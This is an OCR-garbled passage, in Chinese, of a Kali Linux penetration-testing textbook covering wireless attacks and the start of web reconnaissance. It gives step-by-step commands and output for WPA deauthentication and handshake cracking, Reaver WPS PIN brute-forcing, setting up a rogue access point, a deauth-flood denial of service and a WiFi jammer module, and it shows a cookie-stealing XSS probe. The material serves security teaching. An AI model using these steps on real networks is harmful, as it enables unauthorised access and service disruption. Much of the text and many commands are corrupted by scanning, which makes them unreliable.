28:10:7/8:61:20:32 3-127 100 610 13474 210 11 54e WPA2 CCMP PSK gaffer 
BSSID SIATION P'NH Hate Last Frames Probe 
2B:18:7B:61:20:32 660:10:66:70:55:5A -16 48a-54 l 104 
46:16: /8:61:70:327  A4:1/:31:D3:72B:0F -70 0-1 0 23 
£0:16:/6:61:720:32 48:50:60:83:93:6E -127 Qe- Ge 2b 13384 
MAC CH PWR ACK ACK/s CIS RIS RX RIS IX OTHER 
48:50:60:83:93:6E 158 -56 6346 g7 17 5988 19 ] 

' 18: 7H: 51:20. ! BE 12 


4. 使 该 终端 窗口 处 于 打开 状态 ， 


并 打开 另 一 个 终 问 窗口 友 起 取消 私 定 攻击 ; KORE 


WPA 密 钥 。 取 消 鉴 定 攻 击 的 命令 如 下 所 示 : 


图 8.18 


一 个 典型 的 输出 


root@kali:~# aireplay-ng -0 10 -a 28:10:7B:61:20:32 


使 用 户 重新 认证 目标 接 入 点 ， 并 再 次 交换 


-c 00:1D:60:7D:55:5A wlan0 


执行 上 述 命令 的 结果 如 图 8.19 所 示 。 

rootükali:-4 aireplay-ng -0 10 -a 28:10:7B:61:20:32 -c 00:1D:68:7D:55:5A wlanO 
23:50:32 Waiting for beacon frame (BSSID: 28:10:/B:61:20:32) on channel 11 
23:50:33 Sending 64 directed DeAuth. STMAC: [80:1D:60:/D:55:5A] [34/64 ACks] 
23:50:33 Sending 64 directed DeAuth. SIMAC: [860:1D:6€0:/D:55:5A] [54|68 ACKs] 
23:50:34 Sending 64 directed DeAuth. STMAC: [80:1D:60:7D:55:5A] [41]68 ACKs] 
23:50:35 Sending 64 directed DeAuth. SIMAC: [88:1D:68:7D:55:5A] [33|60 ACKs] 
23:50:35 Sending 64 directed DeAuth. STMAC: [00:1D:60:70:55:5A] [36|69 ACKs] 
23:50:36 Sending 64 directed DeAuth. STMAC: [80:1D:68:7D:55:5A] [63|[59 ACks] 
23:50:37 Sending 64 directed DeAuth. SIMAC: [00:1D:60:70:55:5A] [63163 ACKs] 
23:50:37 Sending 64 directed DeAuth. STMAC: [80:1D:60:7D:55:5A] [61162 ACKs] 
23:50:38 Sending 64 directed DeAuth. STMAC: [00:1D:60:70D:55:5A] [63]63 ACKs] 
23:50:39 Sending 64 directed DeAuth. STMAC: [00:1D:60:7D:55:5A] [31|64 ACKs] | 


图 8.19 ”执行 aifeplay-ng-0 10-4» 2- 


成 功 取消 鉴定 攻击 将 显示 ACKs， 这 表明 连接 到 目标 接 入 点 的 客 尸 端 ， 已 接收 到 刚刚 友 送 的 取消 鉴定 命令 


5. 回 顾 最 切 用 于 监控 无 线 传输 的 开放 命令 脚本 ， 确 保 你 捕获 了 4 次 握手 信息 。 
中 显示 。 在 图 8.20 的 示例 中 ， 数 据 显 示 WPA 握 手 的 值 是 28: 10: 7B: 61: 


Rp 


一 个 成 功 的 WPA 握 手 会 在 顶部 右手 边 的 控制 台 
20: 32: 


CH 11 ][ Elapsed: 11 mins ][ 2013-12-15 23:34 
CH 11 ][ Elapsed: 28 mins ][ 2013-12-15 23:51 ][ WPA handshake: 28:10:/B:61:20:32 


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 
28:10:7B:61:20:32 -52 100 16384 162353 7 11 54e WPA? CCMP PSK gaffer 
BSSID STATION PWR Rate Lost Frames Probe 


28:10:7B:61:20:32 @0:10:60:70:55:5A -16  48e-54e 712 12135 


58.20 ”捕获 握手 信息 


6. 由 aircrack 破 解 WPA 密 钥 ， 使 用 一 个 定义 的 词 库 。 由 攻击 者 定义 的 ， 用 于 收集 握手 交互 信息 数据 的 文件 名 位 于 根 目录 下 ， 
而 且 -01.cap 的 扩展 名 将 被 加 载 到 该 文件 名 中 。 


在 Kali 中 ， 词 库 位 于 /usr/share/wordlists 目 录 中 。 虽 然 几 种 词 库 均 是 可 用 的 ， 但 还 是 建议 你 下 载 在 破解 常见 密码 中 最 有 效 
的 列表 。 


在 上 述 示例 中 ， 密 钥 被 预先 放置 在 密码 列表 里 。 实 施 字典 攻击 一 段 时 间 后 ， 破 解 复杂 的 密码 可 能 需要 花费 几 个 小 时 ， 这 取决 
于 该 系统 的 配置 。 下 面 的 命令 使 用 字 (words) 作为 源 词 库 。 


root@kali:~# aircrack-ng wpa-Ol.cap /usr/share/wordlists 
图 8.21 显 示 了 成 功 破 解 WPA 密 钥 的 结果 ; 网 络 监工 的 秘 钥 ， 在 测试 44 个 秘 钥 之 后 被 友 现 是 princessmouse。 


Aircrack-ng 1.2 betal 


[80:00:00] 44 keys tested (594.95 k/s] 
KEY FOUND! [ princessmouse | 
Master Key : BB FS DE 2E AC 98 AD 3E 15 FD E2 2B EF 60 2B 32 
71 A4 EQ 41 BA EO B6 3E F5 OF 77 98 DS CS BO GO 
Transient Key : EA 14 DB E4 AS E4 BD 92 50 58 AB 26 F8 55 AF 73 
46 F4 92 84 BD EA 40 ED 1B FC 62 C6 77 63 B5 1C 
CB SF DB D/ SF 1D BA EG 31 AB F3 Al 05 F/ 55 28 
C3 76 5D 74 7B SD 6E 67 C4 F1 78 B9 15 73 DS 01 


FAPOL HMAC 


图 8.21 发现 秘 铀 


如 果 你 手 上 没有 一 个 定制 的 密码 列表 或 者 希望 迅速 生成 一 个 列表 ， 你 可 以 使 用 Kali 的 crunch 应 用 程序 。 下 面 的 命令 指导 
crunch 程 序 使 用 给 定 的 字符 集 ， 创 建 一 个 最 小 长 度 5 字 符 和 最 大 长 度 25 字 符 的 单词 列表 。 


root@kali:-# crunch 05 25 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX 
Y20123456789 | aircrack-ng --bssid (MAC address) 
-w capture-O01l.cap 


你 还 可 以 使 用 基于 GPU 的 密码 破解 工具 ， 提 高 暴力 攻击 的 有 效 性 (AMD/ATIBSEJE-KoclHashcatf£HIZS An 


cudaHashcat) 。 
要 实现 这 种 攻击 ， 下 先 需 要 使 用 以 下 命令 把 WPA 握 手 信号 交互 捕获 的 文件 psk-01.cap 转 换 成 hashcat 文 件 : 
root@kali:~# aircrack-ng psk-Ol.cap -J <output file> 
转换 完成 后 ， 针 对 最 新 捕获 文件 ， 使 用 以 下 命令 运行 hashcat (选择 匹配 你 的 CPU 架构 和 图 形 卡 的 hashcat 版 本 ) : 
root@kali:~# cudaHashcat-plus32.bin -m 2500 <filename>.hecap 


<wordlist> 


8.6.2 ”使 用 Reaver 攻 击 无 线路 由 器 曝光 


WEP 和 WPA2 也 很 容易 受到 针对 无 线 保 护 设 置 的 接 入 点 、WPSs 和 个 人 识别 码 的 攻击 。 


大 多 数 接 入 后 支持 WiFi 保 护 设置 (WiFi Protected Setup, WPS) 协议 ， 其 在 2006 年 成 为 一 个 允许 用 户 很 轻松 地 设置 和 配 
置 接 入 点 的 标准 ， 并 可 以 为 现 有 网 络 增 加 新 设备 ， 而 无 需 重 新 输入 大 量 且 复 杂 的 密码 。 


不 幸 的 是 ， 该 个 人 识别 码 为 一 个 8 位 数字 序号 (可 能 是 100000000) ， 并 且 最 后 一 个 数字 是 一 个 校 验 值 。 因 为 WPS 认 证 协议 
把 该 个 人 识别 码 一 分 为 二 ， 并 分 别 对 其 进行 验证 ， 那 就 意味 着 它 的 前 半 部 分 的 值 为 104 (10000) ， 后 半 部 分 的 值 为 
103 (1000) 一 一 攻击 者 只 需 通 过 进行 最 大 数量 为 11000 次 猜测 束 能 破解 该 接 入 点 ! 


Reaver 是 一 种 旨 在 最 大 限度 地 进行 猜测 的 工具 (尽管 Wifite 同 样 可 以 进行 WPS 猜 测 ) 。 
进行 Reaver 攻 击 ， 可 以 通过 如 下 命令 使 用 一 个 叫 作 wash 的 同类 工具 来 识别 网 络 的 任何 漏洞 : 


root@kali:~# wash -i wlan0O --ignore-fcs 
如 果 该 网 络 有 任何 网 络 漏洞 ， 可 以 使 用 如 下 命令 友 起 对 这 些 漏洞 的 攻击 : 
root@kali:~# reaver -i wlanO -b (BBSID) -vv 


在 Kali 中 测试 这 种 攻击 表明 ， 这 种 攻击 速度 缓慢 且 容易 失败 ;然而 ， 它 可 以 用 作 背 景 攻击 ,或 者 补充 其 他 路 由 攻击 来 破解 
WPA 网 络 。 


8.7 ”克隆 接 入 所 


一 个 针对 无 线 网 络 比 较 有 趣 的 攻击 是 依赖 克隆 接 入 点 ， 当 用 户 试 图 连接 到 克隆 点 时 ， 监 测 其 传输 的 信息 。 攻 击 者 不 仅 可 以 获 
得 认证 人 乞 件 ， 也 可 以 使 用 中 间 人 攻击 拦截 或 重 定向 网 络 流量 。 


Kali 中 包含 了 几 个 声称 用 来 支持 克隆 或 盗窃 接 入 点 的 工具 ; 但 是 ， 此 时 这 些 工具 有 一 些 缺 陷 。 比 如 ， 社 会 工程 学 的 Toolkit 和 和 
Websploit 不 能 与 预 装 在 Kali 系 统 中 的 DHCP 服 务 器 集成 。 


大 多 数 攻击 者 都 在 寻找 外 部 工具 ， 包 括 Gerix 或 者 easy-creds 等 脚本 ; 自然 ，aircrack-ng 组 件 也 包含 一 个 用 于 克隆 接 入 点 的 
airbase-ng 工 具 。 


为 了 伪造 一 个 无 线 接 入 点 ， 攻 击 者 将 完成 以 下 任务 : 

1. 在 监视 模式 中 局 用 wlan0 端 口 ， 这 将 创建 一 个 用 于 监视 的 mon0 接 口 ， 使 用 以 下 命令 : 

root@kali:~# airmon-ng start wlanO 

2. 使 用 以 下 命令 在 mon0 上 建立 接 入 点 (AP) 。 社 会 工程 学 对 成 功 的 AP 有 重要 的 影响 ， 例 如 ， 可 以 使 用 一 个 吸引 目标 客户 
病 的 名 字 。 这 个 示例 中 ， 我 们 将 使 用 一 个 通用 的 开放 WiFi 网 络 。 它 将 在 WiFi 信 道 6 上 被 建立 : 


root@kali:~# airbase-ng --essid Customer Network 
-c 6 monO 


3. 使 用 如 下 命令 安装 公共 桥 : 

apt-get install bridge-utils 

4. 在 另 一 个 终端 窗口 中 ， 创 建 一 个 桥 (rogue) ， 并 且 使 用 公共 桥 (注意 ， 这 些 公共 桥接 必需 首先 使 用 apt-get install 
bridge-utilszzzx:) 连接 at0 (Zat 0 接口 是 通过 前 面 的 命令 创建 的 ) 到 eth0。 

root@kali:-~# brctl addbr rogue 

root@kali:~# brctl addif rogue atO0 

root@kali:-~-# brctl addif rogue eth0 


因为 这 两 个 接口 都 集成 到了 该 虚拟 桥 中 ， 所 以 你 可 以 使 用 如 下 命令 获得 它们 的 iP 地址 : 


root@kali:~# ifconfig at0 down 
root@kali:~# ifconfig at 0.0.0.0 up 
root@kali:~# ifconfig eth0 down 
root@kali:~# ifconfig ethO 0.0.0.0 up 
5. 使 用 以 下 命令 启用 桥接 器 之 上 的 IP 转 发 功能 : 


root@kali:~# echo 1 > /proc/sys/net/ipv4/ip forward 


6. 使 用 如 下 命令 ， 用 局 域 网 的 IP 地 址 配置 该 桥接 器 ， 使 其 连接 天 eth0 尊 口 : 


root@kali:~# ifconfig rogue 10.1.x.y netmask 
255.255.255.0 broadcast 10.1.x.255 up 


root@kali:~# route add default gw 10.1.x.1 


7. 使 用 如 下 命令 ， 局 用 AP 来 咒 探 认证 握手 交互 信息 : 


airbase-ng -c 6 -e --ESSID /file path/file.cap wlanO 


8.8 ”拒绝 服务 攻击 曝光 


我 们 将 要 评估 的 最 后 一 个 针对 无 线 网 络 的 攻击 是 拒绝 服务 攻击 ， 在 这 里 ， 攻 击 者 将 使 合法 用 户 访问 无 线 网 络 的 权限 丧失 ， 或 
通过 致使 网 络 朋 省 的 万 法 使 网 络 不 可 用 。 无 线 网 络 极其 容易 受 拒 绝 服务 攻击 ， 并 且 在 分 布 式 的 无 线 网 络 上 ， 很 难 定位 攻击 者 。 拒 
绝 服务 攻击 的 例子 包括 以 下 内 容 : 


注入 制作 网 络 命令 ， 比 如 在 无 线 网 络 上 重新 配置 命令 可 能 引起 路 由 堪 、 交 换 机 和 其 他 网 络 设备 的 失效 。 


^ 
一 至 设 备 和 应 用 程序 可 以 识别 正在 及 生 的 攻击 ， 并 通过 目 动 共用 网 络 来 实现 啊 应 。 亚 意 的 攻击 者 可 以 友 起 一 个 很 明显 的 攻击 ， 然 后 让 目标 目 
己 创建 拒绝 服务 攻击 。 


用 大 量 数据 包 潜 泛 攻 击 无 线 网 络 ， 可 以 致使 该 网 络 不 可 用 ;例如 ，HTTPF 潜 泛 攻击 可 以 使 数 和 干 个 页 面 同 时 请 求 访问 一 个 web 服 务工 ， 这 可 以 耗 
尽 该 Web 服 务 器 的 处 理 能 力 。 在 相同 的 方式 下 ， 使 用 认证 和 关联 数据 包 块 ， 用 户 可 从 其 连接 的 接 入 点 洪 泛 攻击 该 网 络 。 


攻击 者 通过 精心 设计 具体 的 解除 认证 和 解除 关联 的 命令 ， 可 以 在 无 线 网 络 中 ， 用 关闭 授权 连接 来 洪 泛 攻击 该 网 络 ， 并 停止 合法 用 户 维护 他 们 
到 无 线 接 入 反 的 连接 。 


为 了 证 明 最 后 一 点 ， 我 们 将 使 用 取消 认证 数据 包 ， 来 创建 一 个 泛 洪 拒绝 服务 攻击 。 因 为 无 线 802.11 协 议 是 在 收 到 定义 的 数 
据 包 时 建立 的 ， 且 其 支持 解除 认证 (所 以 ， 当 连接 不 需要 时 ， 用 户 可 以 中 断 该 连接 ) ， 这 可 能 是 一 个 毁 次 性 的 攻击 一 一 它 符合 
标准 ， 并 且 没 有 办 法 可 阻止 其 友 生 。 


使 合法 用 户 天 闭 网 络 的 最 简单 方法 是 针对 他 们 使 用 一 个 解除 认证 数据 包 流 。 这 些 可 以 在 aircrack-ng 工 具 套件 的 帮助 下 完 
成 ， 使 用 如 下 命令 : 


root@kali:~# aireplay-ng -0 0 -a (bssid) -c wlanO 


此 命令 确定 攻击 类 型 为 -0， 表 明 它 是 一 个 取消 鉴定 攻击 。 第 二 个 0 (58) 友 射 连续 的 取消 签 定 数据 包 流 ， 使 得 网 络 无 法 为 其 
他 用 尸 所 用 。 


Websploit 框 习 是 用 来 扫 摘 和 分 析 远 程 系统 的 开源 工具 。 它 包含 几 个 工具 ， 包 括 特 定 的 无 线 攻 击 工具 。 要 局 动 尼 ， 需 要 打开 
一 个 命令 脚本 并 简单 地 输入 websploit。 


该 Websploit 界 面 类 似 于 recon-ng 和 Metasploit 框 架 ， 并 将 其 作为 一 个 模块 化 接口 显示 给 用 户 。 


一 经 友 起 ， 可 以 使 用 show modules 命 令 来 显示 在 现 有 版 本 中 的 攻击 模块 。 使 用 use wifi/wifi_jammer 命 令 选 择 WiFi 干 扰 友 
射 机 (一 种 取消 鉴 定数 据 包 流 ) 。 如 图 8.22 所 示 ， 攻 击 者 只 需要 使 用 set 命 令 来 设置 各 种 选项 ， 然 后 选择 run 友 起 攻击 。 


wsf+ > use wifi/wifi jammer 


wSf:Wifi Jammer > show options 

Options Yalue RQ Description 

interface wlang yes Wireless Interface Name 
bssid yes Target BSSID Address 
essid yes Target ESSID Name 

mon mong yes Monitor Mod({default) 
channel 11 yes Target Channel Number 


图 8.22 ”使 用 wifi_jammet 命 令 


8.9 小 结 


在 本 章 中 ， 我 们 研究 了 针对 无 线 网 络 攻 击 的 几 个 成 功 的 管理 任务 ， 包 括 无 线 适 配器 的 选择 、 无 线 调 制 解 调 器 的 配置 ， 以 及 侦 
察 工 具 如 aircrack-ng Kismet。 我 们 重点 使 用 了 aircrack-ng 的 工具 组 件 来 确定 隐藏 网 络 ， 绕 过 MAC 地 址 认证 ， 并 破解 WEP 和 
WPA/WPA2 加 密 。 我 们 也 看 到 了 如 何 克 隆 或 复制 无 线 接 入 点 ， 以 及 如 何 针对 无 线 网 络 执行 拒绝 服务 攻击 。 


在 接 下 来 的 章节 中 ， 将 重点 天 注 攻击 者 如 何 攻 击 一 个 网 站 和 该 网 站 的 服务 。 我 们 将 研究 用 于 侦察 的 工具 ， 尤 其 是 客户 端 代理 
和 漏洞 扫 摘 程序 。 我 们 会 看 到 攻击 者 如 何 使 用 自动 化 工具 来 利用 这 些 漏洞 ， 如 利用 框架 和 在 线 密码 破解 。 更 重要 的 是 ， 我 们 将 讨 


论 一些 通 党 需要 人 工 干 预 的 离散 的 攻击 ， 如 注入 攻击 和 跨 站 点 脚本 。 最 后 ， 我 们 将 着 眼 于 在 线 服 务 的 特点 和 原因 ， 以 及 它们 为 何 
容易 受到 DoS 攻 击 。 


第 9 章 ”基于 Web 应 用 的 侦察 与 利用 


在 前 面 的 草书 中 ， 我 们 回顾 了 攻击 者 的 杀 链 一 一 用 来 攻击 网 络 和 设备 、 友 现 数据 ， 或 阻碍 访问 网 络 资 源 等 内 容 。 在 第 7 章 
FB, 我们 从 物理 攻击 和 社会 工程 学 出 友人 研究 了 攻击 的 路 线 。 在 第 8 草 中 ， 我 们 看 到 了 无 线 网 络 如 何 被 入 侵 。 在 本 草 中 ， 我 们 将 重 
点 研究 最 单 见 的 攻击 途径 之 一 一 通过 网 站 或 基于 Web 应 用 的 攻击 。 


提供 内 容 和 基于 网 络 的 服务 〈 例 如， 电子 邮件 和 FTP) 的 网 站 是 普遍 存在 的 ， 并 且 大 多 数组 织 允 许 远程 访问 这 些 服务 和 几乎 
所 有 可 用 内 容 。 然 而 ， 对 于 渗透 测试 者 和 攻击 者 ， 网 站 暴露 了 在 网 络 上 的 后 端 服务 、 访 问 网 站 的 用 户 客户 端的 活动 ， 以 及 用 户 和 
该 网 站 之 间 连 接 数 据 的 频繁 攻击 。 本 章 将 重点 从 网 站 和 网 络 服务 的 攻击 者 的 角度 来 讨论 ， 我 们 会 在 第 10 章 回顾 攻击 连接 ， 在 第 
11 章 讨论 应 用 客户 端的 攻击 。 


通过 本 章 最 后 的 学 习 ， 你 将 了 解 以 下 内 容 : 
基于 Web 服 务 的 扩展 侦察 原则 。 

-漏洞 扫描 。 

AB HEP INR e 

利用 Web 服务 漏洞 。 

-利用 网 络 后 门 ， 维 护 访问 入 侵 系统 。 


Ve aves ， 我 们 将 使 用 NOWASP 或 Mutil1ligae 作 为 目标 网 站 ， 网 站 包含 已 知 的 可 以 被 利用 的 漏洞 ， 可 以 
从 www.owasp.org/index.php/Category:OWASP Mutillidae 下 载 它们 。 使 用 LAMP、WAMP 和 XAMPP， 该 Web 应 用 程序 可 以 直接 安装 到 


Linux 或 Windows。 它 还 预 装 在 SamauraiWTF 和 Metasploitable 测 试 环 境 。 参 见 附录 中 对 创建 Metasploitable 测 试 环境 的 说 明 。 


9.1 ”对 网 站 进行 侦察 


网 站 (提供 服务 的 网 站 ) 是 特别 复杂 的 。 通 党 情况 下 ， 交 付 给 最 终 用 户 的 服务 使 用 的 是 多 层 架构 的 Web 服 务 器 ， 这 些 服务 
器 面向 互联 网 的 公众 开放 ， 同 时 与 后 端 服务 器 和 位 于 网 络 上 的 数据 库 进 行 通信 。 


在 测试 过 程 中 ， 必 须 考 虑 由 复杂 度 引 起 的 几 个 额外 因素 ， 其 中 包括 以 下 内 容 : 


网 络 体系 结构 ， 包 括 安 全 控制 (防火 墙 、IDS/IPS 和 蜜 钠 ) 和 配置 ， 诸 如 负载 均衡 。 

:主机 网 络 服 务 系统 的 平台 染 构 硬件、 操作 系统 和 附加 应 用 程序 〉。 

应用、 中 间 件 和 终极 数据 库 ， 它 们 可 能 采用 不 同 的 平台 (UNIX 或 Windows〉 、 供 应 商 、 编 程 语言 ， 以 及 商业 和 专用 软件 的 组 合 。 
认证 和 授权 过 程 ， 包 括 在 应 用 程序 中 你 持 会 话 状 态 的 过 程 。 

:管理 应 用 程序 的 基本 业务 逻辑 。 

客户 中 与 网 络 服务 的 交互 与 通信 。 


鉴于 网 络 服务 的 复杂 性 ， 适 应 每 个 网 站 的 特殊 架构 和 服务 参数 ， 对 渗透 测试 者 是 非常 重要 的 。 同 时 ， 测 试 过 程 必须 持续 且 确 
保 没 有 遗漏 ， 当 前 已 经 提出 了 几 种 方法 可 以 实现 这 些 目 标 。 最 广泛 接受 的 是 开放 Web 应 用 安全 项 目 (Open Web Application 
Security Project, OWASP) (www.owasp.org) ， 它 列 出 了 10 大 漏洞 。 


作为 一 个 最 低 标准 ，OWAsP 辐 测试 人 员 提 供 了 一 种 强 有 力 的 万 向 。 然 而， 只 专注 于 前 10 个 漏洞 显然 不 具有 前 瞻 性 ， 并 且 该 
方法 已 经 展示 了 一 些 缺 口 ， 特 别 是 用 该 万 法 去 寻找 应 用 程序 如 何 文 撑 商 业 活动 的 逻辑 漏洞 时 。 


在 使 用 “ 杀 链 ”方法 时 ， 针 对 一 些 特定 于 网 络 服务 侦察 的 活动 ， 需 要 强调 以 下 几 氮 内 容 : 


-确定 目标 站 点 ， 特 别 是 关于 在 哪里 ， 以 及 它 是 如 何 托管 的 。 


, 枚 举目 标 网 站 的 目录 结构 和 文件 ， 包 括 确定 是 否 在 用 一 个 内 容 管理 系统 《Content Management System, CMS) 。 这 可 能 包括 下 载 网 站 做 
离线 分 析 ， 如 文档 的 元 数据 分 析 ， 并 利用 网 站 创建 一 个 上 自 定 义 词 表 (使 用 密码 破解 程序 ， 如 crunch)。 它 还 确保 识别 所 有 支持 文件 。 


-确定 里 份 验证 和 授权 机 制 ， 并 确定 在 与 网 络 服务 的 交易 中 ， 如 何 维护 会 话 的 状态 。 这 通常 包括 对 cookies 的 分 析 和 它们 是 如 何 使 用 的 。 


n 的 表格 。 这 些 是 用 户 和 输入 数据 以 及 与 Web 服 务 进行 交互 的 主要 手段 ， 这 些 都 是 一 些 可 利用 的 漏洞 的 具体 地 点 ， 如 SQL 注入 攻击 、 路 站 


识别 接受 输入 的 其 他 领域 ， 如 人 允许 文件 上 传 的 页 面 ， 以 及 可 接受 的 上 传 文件 类 型 的 任何 限制 。 
-标识 如 何 处 理 错 误 ， 并 且 由 用 户 接收 的 实际 的 错误 消 恩 ;往往 该 错误 将 提供 有 价值 的 内 部 信息 ， 如 使 用 软件 的 版 本 或 内 部 的 文件 名 和 进程 。 
-确定 哪些 页 面 需要 和 保持 安全 套 接 字 层 协议 或 其 他 安全 协议 《参见 第 10 章 ) 。 


香 先 进行 如 前 所 述 的 被 动 侦察 和 主动 侦察 (参见 第 2 章 和 第 3 章 ) ; 尤其 确保 识别 托管 的 网 站 ， 然 后 使 用 DNS 映射 来 标识 由 
相同 的 服务 器 提供 服务 的 主机 位 置 (攻击 最 党 见 和 最 成 功 的 方法 之 一 ， 是 攻击 位 于 目标 服务 器 同一 物理 位 置 的 非 目标 主机 网 站 ， 
利用 服务 器 的 弱点 来 获得 root 权 限 ， 然 后 使 用 特权 升级 攻击 目标 网 站 ) 。 


其 次 确定 仓 在 的 基于 网 络 的 防护 设备 ， 如 防火 墙 、IDs/IPS 和 密 镀 扩 术 。 一 个 趣 来 趣 音 志 的 保护 闭 置 是 Web 应 用 防火 墙 
(Web Application Firewall, WAF) 。 


如 果 正 在 使 用 WAF， 测 试 人 员 必 须 通过 编码 来 确保 绕 过 WAF， 尤 其 是 那些 依赖 于 手工 输入 的 攻击 。 


WAF 可 以 通过 手动 检查 cookie (一 些 WAF 标 签 或 修改 cookie， 涉 及 Web 服 务 器 和 客户 端 之 间 的 通信 ) ， 或 者 通过 改变 报头 
言 息 来 识别 ( 当 一 个 测试 者 使 用 命令 行 工具 连接 到 端口 80 时 ， 会 被 识别 ) 。 


WAF 检 测 过程 中 ， 可 以 目 动 使 用 nmap 的 脚本 ，http-waf-detect.nse， 如 图 9.1 所 示 。 


rootükali:-4 nmap -p 80 --script http-waf-detect.nse 


starting Nrap 6.40 ( http://nmap.org ) at 2013-12-26 13:30 EST 


Nmap scan report for ( .196) 
Host is up (0.0044s Latency). 
rONS recorc for Tm" EmÓm.96: 


PORT SIATE SERVICE 

S0/tcp oper http 

| http-waf-detect: IDS/IPS/WAF detected: 

E | :80/ ?p4AylO4d3-«script-alert(document.cookie)s/script- 


scanned in 6.39 seconds 


) 


Nmap done: 1 IP address {1 host up 


图 9.1 WAF 检 测 过 程 


nmap 脚 本 识别 一 个 WAF 的 存在 。 然 而 ， 脚 本 测试 已 经 表明 ， 它 并 不 忌 是 得 到 准确 的 结果 ， 返 回 的 数据 可 能 过 于 入 统 ， 以 致 
不 能 引导 一 个 有 效 策 略 来 绕 过 防火 墙 。 


wafw00f 脚 本 是 一 个 自动 化 的 工具 ， 可 以 识别 和 提取 基于 网 络 的 防火 墙 指纹 ; 试验 已 确定 它 是 用 于 此 目的 最 准确 的 工具 ，。 
该 脚本 很 容易 从 Kali 调 用 ， 一 个 样本 的 输出 如 图 9.2 所 示 。 


root@kali:~# wafwOOT http://www. .ca 


R We ONE AA Y. XN Y )J 
| v 4/8 J/ /IVYV//eOA/o 7 
Iu Jo mo, — uma Au^ xu a 


ea 


WAFWOGF - Web Application Firewall Detection Tool 


By Sandro Gauci && Wendel G. Henrique 


Checking http://www. .ca 
Generic Detection results: 
The site http://www. .ca seems to be behind a WAF 


Reason: Blocking is being done at connection/packet Level. 
Number of requests: 12 


图 9.2 ”wafw00f 脚 本 检测 


负载 均衡 器 (Load Balancing Detector, LBD) 是 一 个 bash shell 脚 本 ， 确 定 一 个 给 定 的 域 是 否 使 用 DNS 或 HTTP 负 载 均 
衡 。 这 是 从 测试 者 的 角度 得 到 的 很 重要 的 信息 ， 因 为 当 测 试 了 一 个 服务 器 ， 它 可 以 解释 看 似 反常 的 结果 ， 然 后 负载 均衡 器 开关 要 
求 不 同 的 服务 器 。lbd 采 用 多 种 检查 来 识别 负载 均衡 的 存在 。 一 个 样本 的 输出 如 图 9.3 所 示 。 


root@kali:~# Lbd www.digitaldefence.ca 

lbd - Load balancing detector 0.1 - Checks if a given domain uses load-balancing 
Written by Stefan Behte (http://ge.mine.nu) 
Proof-of-concept! Might give false positives 

Checking for DNS-Loadbalancing: NOT FOUND 

Checking for HIIP-Loadbalancing [Server]: 

NOI FOUND 

Checking for HIIP-Loadbalancing [Date]: 17:52:36, 17:52:37, 17:52:38, 17:52:38, 

17:52:38, 17:52:39, 1/:52:39, 17:52:39, 17:52:40; 1/:52:40, 17:52:46, 17:52:46, 

17:52:41, 17:52:41, 17:52:41, 17:52:42, 17:52:42, 17:52:43, 17:52:43, 17:52:44, 

17:52:44; 17:52:44. 17:52:45, 17:52:05, 17:52:47, 17:52:47, 17:52:48, 17:52:48, 

7:52:52, 17:52:52, 17:52:52, 17:52:53, 17:52:53, 17:52:94, 17:52:54, 17:52:54, 

1]/:52:5h5. 17:52:55, 17:52:56, 17:52:58, 17:52:58, 17:52:59, 17:52:59, 17:53:00, 

17:53:01, 17:53:01, 17:53:00, FOUND 

Checking for HTTP-Loadbalancing [Diff]: NOT FOUND 


www.digitaldefence.ca does Load-balancing. Found via Methods: HTTP[Date] 


图 9.3 ”使 用 lbd 


该 网 站 应 进行 检查 以 确定 可 用 于 建立 和 维护 它 的 CMS。CMS 应 用 程序 包括 Drupal、Joomla 和 WordPress 等 ， 其 中 ， 使 用 
威胁 管理 界面 ， 可 以 配置 一 个 访问 来 提升 权限 ， 或 访问 可 能 含有 可 利用 的 漏洞 。 


Kali 包 括 一 台 名 为 BlindElephant 的 目 动 扫 摘 仪 ， 用 来 提取 CMS 指 纹 以 确定 版 本 信息 。 样 本 输出 如 图 9.4 所 示 。 


irootükali:-4 BLindELephant .py | joomla 
Loaded /usr/lib/python2.7/dist-packages/blindelephant/dbs/joomla.pkl with 79 ver| 
sions, 4363 differentiating paths, and 388 version groups. 

Starting BlindElephant fingerprint for version of joomla at 


Hit http:// /Language/en-GB/en-GB.ini 
Possible versions based on result: 1.5.15, 1.5.18, 1.5.19, 1.5.20, 1.5.21, 1.5.2 
2; lod. low, L.m.45. L.2.25 


Hit http:// /Language/en-G6B/en-GB.com content.ini 
Possible versions based on result: 1.5.16, 1.5.17, 1.5.18, 1.5.19, 1.5.20, 1.5.2 
D; 1.5.22, 1:59.43, 1:59.20, l.5.243, l1.5.4b 


图 9.4 使 用 BlindElephant 


BlindElephant 回 顾 了 CMS 组 件 的 指纹 图 谱 ， 然 后 为 目前 所 存在 的 版 本 提供 了 一 个 最 好 的 猜测 。 然 而 ， 像 其 他 的 应 用 ,我们 
已 经 友 现 它 可 能 无 法 检测 CMS;， 因此 ， 总 是 需要 验证 其 他 扫 摘 绪 果 ， 针 对 为 特定 的 目录 和 文件 抓 取 网 站 的 其 他 扫 摘 仪 内 容 ， 或 
手动 检查 站 点。 


一 个 特定 的 扫描 工具 ， 如 目 动 化 网 络 聆 虫 ， 可 用 来 验证 已 收集 的 信息 ， 以 及 确定 特定 网 站 的 现 有 的 目录 和 文件 结构 。 网 络 让 
虫 的 典型 表现 包括 管理 门户 、 配 置 文件 〈 当 前 及 以 前 的 版 本 ) ， 可 能 包含 内 部 硬 编码 访问 插 据 、 内 部 结构 信息 、 网 站 的 备份 晶 
本 、 管 理 员 笔记 、 机 密 的 个 人 信息 和 源 代码 。 


卡 利 支持 多 种 网 络 拒 虫 ， 包 括 Burp Suite, DirBuster, OWASP-ZAP, Vega, WebScarab#]WebSlayer, & FHI LE 


是 DirBuster。 


DirBuster 是 图 形 用 尸 界 面 驱动 的 ， 使 用 可 能 的 目录 和 文件 列表 ， 对 网 站 的 结构 进行 蛮 力 分 析 的 应 用 程序 。 可 以 在 一 个 表 或 
树 中 查看 响应 ， 并 且 能 准确 地 反映 网 站 的 结构 。 针 对 目标 网 站 执行 该 程序 的 输出 如 图 9.5 所 示 。 


OWASP DirBuster 1.0-RC1 - Web Application Brute Forcing PIN x 


File Options About Help 


http://www MI 
Scan Information \ Results - List View: Dirs: 27 Files: 39° Results - Tree View | A Errors: 73 \ 


Directory Stucture Ji Response Code li Response Size 
(E 200 37221 


Ga images 403 1417 
[D] login.aspx 200 21497 
--[] Events.aspx 200 136905 
z [ Calendar, aspx 700 119308 
—[ AboutUs. aspx 200 35289 
